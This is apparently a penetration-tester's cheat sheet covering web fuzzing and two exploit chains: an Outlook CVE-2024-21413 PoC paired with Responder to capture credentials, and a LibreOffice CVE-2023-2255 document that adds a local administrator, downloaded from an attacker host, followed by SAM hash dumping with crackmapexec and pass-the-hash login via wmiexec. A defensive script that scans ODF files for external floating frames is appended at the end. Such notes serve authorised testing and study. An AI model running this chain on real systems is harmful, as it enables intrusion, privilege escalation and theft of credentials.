Common web fuzzing commands

  • general path search
> dirsearch -u http://target -x 403,404
  • find available parameters
> wfuzz -w /usr/share/wordlists/dirb/common.txt -u "http://target/file.php?FUZZ=test"
> wfuzz -w /usr/share/wordlists/Bug-Bounty-Wordlists/windows-lfi.txt -u "http://target/file.php?file=../../../FUZZ"

CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability PoC

This script requires SMTP authentication to send an email, bypassing SPF, DKIM, and DMARC checks, which helps in simulating a real-world attack scenario more effectively.

> python3 CVE-2024-21413.py --server target --port 587 --username user@target --password passwd --sender user@domain --recipient victim@target --url '\\kali' --subject XD

> responder -I <eth>

CVE-2023-2255

Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice, documents that used “floating frames” linked to external files would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.

# on kali
python3 CVE-2023-2255.py --cmd 'net localgroup Administrator user /add' --output 'test.odt'

# target
wget http://kali/test.odt -O "c:\path\test.odt"
  • once the user has been added to the admin group, dump the hashes and access the target as admin
> crackmapexec smb target -u user -p pass --sam
[*] Initializing FTP protocol database
SMB         target     445    target          [*] Windows 10.0 Build 19041 x64 (name:target) (domain:target) (signing:False) (SMBv1:False)
SMB         target     445    target          [+] target\user:pass (Pwn3d!)
SMB         target     445    target          [+] Dumping SAM hashes
SMB         target     445    target          admin1:500:aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf:::
SMB         target     445    target          admin2:501:aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf:::
SMB         target     445    target          [+] Added 6 SAM hashes to the database

> impacket-wmiexec admin1@target -hashes "aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf"
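
For triage of the CVE-2023-2255 behaviour described above, the following added example (not part of the original page or of the PoC script) lists the floating frames in an ODF file whose link resolves outside the package, so a document can be checked before it is opened in an unpatched LibreOffice. The is_external heuristic, the size cap and the sample document are assumptions constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET  # for untrusted files prefer defusedxml (third-party)
from urllib.parse import urlparse

DRAW = "urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"
XLINK = "http://www.w3.org/1999/xlink"
OFFICE = "urn:oasis:names:tc:opendocument:xmlns:office:1.0"
MAX_XML = 50 * 1024 * 1024  # refuse oversized parts (zip-bomb guard)

def is_external(href):
    """Heuristic (assumption): UNC, absolute, parent-relative or any URL scheme."""
    return href.startswith(("\\\\", "//", "/", "../")) or urlparse(href).scheme != ""

def external_floating_frames(odf):
    """List hrefs of draw:floating-frame elements that resolve outside the package.
    `odf` is a path or binary file object for an .odt/.ods/.odp file."""
    hits = []
    with zipfile.ZipFile(odf) as z:
        for part in ("content.xml", "styles.xml"):
            if part not in z.namelist():
                continue
            if z.getinfo(part).file_size > MAX_XML:
                raise ValueError(f"{part} is suspiciously large")
            root = ET.fromstring(z.read(part))
            for frame in root.iter(f"{{{DRAW}}}floating-frame"):
                href = frame.get(f"{{{XLINK}}}href", "")
                if is_external(href):
                    hits.append((part, href))
    return hits

def sample_odt(href):
    """Constructed sample: minimal ODF package with one floating frame."""
    content = (
        f'<office:document-content xmlns:office="{OFFICE}" xmlns:draw="{DRAW}" '
        f'xmlns:xlink="{XLINK}"><office:body><draw:frame>'
        f'<draw:floating-frame xlink:href="{href}" xlink:actuate="onLoad"/>'
        '</draw:frame></office:body></office:document-content>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        z.writestr("content.xml", content)
    buf.seek(0)
    return buf

if __name__ == "__main__":
    for part, href in external_floating_frames(sample_odt("https://files.example.test/frame.html")):
        print(f"{part}: floating frame loads {href}")
```

A non-empty result on a document from an untrusted source is a reason to hold it for review; upgrading to LibreOffice 7.4.7 / 7.5.3 or later restores the permission prompt.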
